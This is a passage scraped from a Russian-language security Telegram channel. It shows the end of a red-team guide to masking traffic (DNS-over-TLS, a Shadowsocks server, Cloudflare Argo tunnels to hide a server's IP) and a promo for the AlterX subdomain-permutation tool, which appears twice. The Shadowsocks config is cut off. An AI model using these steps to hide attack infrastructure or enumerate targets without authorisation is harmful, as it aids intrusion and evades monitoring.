DNS=1.1.1.1#cloudflare-dns.com
FallbackDNS=1.0.0.1#cloudflare-dns.com
DNSOverTLS=yes
Применяем настройки:
sudo systemctl restart systemd-resolved
⏺Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:
sudo apt install shadowsocks-libev
Открываем конфиг
/etc/shadowsocks-libev/config.json
:{
Запускаем сервер:
sudo systemctl start shadowsocks-libev
⏺Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:
cloudflared tunnel create my-tunnel
cloudflared tunnel route dns my-tunnel mydomain.com
cloudflared tunnel run my-tunnel
ZeroDay | #redteam #маскировкатрафика
25.03.202510:00
AlterX: Быстро генерируем субдомены для пентеста
👋
⏺Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.
⏺Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.
⏺Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.
⏺И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.
⏺Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.
⏺Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.
⏺И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка
ZeroDay | #Инструмент
Shown 1 - 24 of 32
Log in to unlock more functionality.